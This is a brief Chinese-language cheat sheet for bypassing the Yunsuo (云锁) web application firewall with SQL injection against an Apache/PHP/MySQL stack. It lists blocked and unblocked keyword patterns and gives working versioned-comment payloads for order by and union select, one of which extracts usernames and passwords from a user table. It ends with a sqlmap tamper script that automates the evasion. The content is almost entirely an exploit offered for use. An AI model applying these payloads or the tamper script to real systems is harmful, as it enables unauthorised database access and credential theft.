Apache/2.4.23
PHP/5.4
mysql 5

一：order by 绕过 
`order/*!10000by*/5 `  

二： union select 绕过
union  不拦截
select  不拦截
union select 拦截
union 各种字符 select 拦截
`union/*select*/ `不拦截

`union%20/*!10000all%20select*/%201,2,database/**/(),4,5`  

`union/*!10000all*//*!10000select+1,password,username*/,4,5%20from%20user`  



tamper：
# coding=UTF-8
# Desc: sqlmap bypass 云锁 tamper
"""
Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""

import re

from lib.core.data import kb
from lib.core.enums import PRIORITY
from lib.core.common import singleTimeWarnMessage
from lib.core.enums import DBMS
__priority__ = PRIORITY.LOW


def dependencies():
    pass


def tamper(payload, **kwargs):
    payload = payload.replace('ORDER', '/*!00000order*/')
    payload = payload.replace('ALL SELECT', '/*!00000all*/ /*!00000select')
    payload = payload.replace('CONCAT(', "CONCAT/**/(")
    payload = payload.replace("--", " */--")
    payload = payload.replace("AND", "%26%26")
    return payload
